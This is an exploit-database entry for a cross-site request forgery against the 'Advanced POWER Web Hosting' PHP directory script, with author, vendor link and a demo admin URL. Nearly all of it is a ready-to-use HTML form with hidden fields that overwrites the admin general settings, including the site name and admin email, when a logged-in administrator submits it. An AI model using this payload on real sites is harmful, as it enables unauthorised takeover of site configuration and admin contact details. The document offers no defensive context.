Advanced POWER Web Hosting CSRF

# Exploit Title: Advanced POWER Web Hosting CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/advanced-power-web-hosting-directory-script-php/22752/
# Category::  webapps
# Demo : http://www.softbizscripts.com/scripts/hostdirectory/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form action="update_general_set.php" method="post" name="form123" id="form123"  onSubmit="return Validator(this);" >
<input name="sb_null_char" class="box1" id="recperpage3" value="- -" size="7" type="hidden">
<input name="small_dlength" id="small_dlength" size="7" value="550" type="hidden">
<input name="sb_expiry" id="sb_expiry" value="-1" onclick="handle_click(this.form);" type="hidden" checked> 
<input name="expiry_duration" id="expiry_duration" size="7" value="10000" disabled="disabled" type="hidden">
<input name="max_period" id="max_period" value="-1" size="7" disabled="disabled" type="hidden">
<input name="max_ext_period" id="max_ext_period2" value="0" size="7" disabled="disabled" type="hidden">
<input name="sb_image_size" class="box1" id="recperpage3" value="60000" type="hidden">
<input name="site_keywords" class="box1" id="site_keywords" value="rawebhosting" size="35" type="hidden">
<input name="sitename" class="box1" id="sitename" value="welcome to rawebhosting.net" size="35" type="hidden">
<input name="adminemail" class="box1" id="adminemail" value="[email protected]" size="35" type="hidden">
<input name="siteaddrs" class="box1" id="siteaddrs" value="websiteadres.net" size="35" type="hidden">
<input name="list1" id="list1" value="20671095.gif" size="20" readonly="readonly" type="hidden"> 
<input name="btn_name2" value="Upload" onclick="attachment('list1')" type="hidden"> 
<input name="buttonname2" value="Remove" onclick="removeattachment()" type="hidden"> 
<input name="Submit2" class="submit" value="Update" type="submit"> 
</form>



#  0day.today [2018-02-16]  #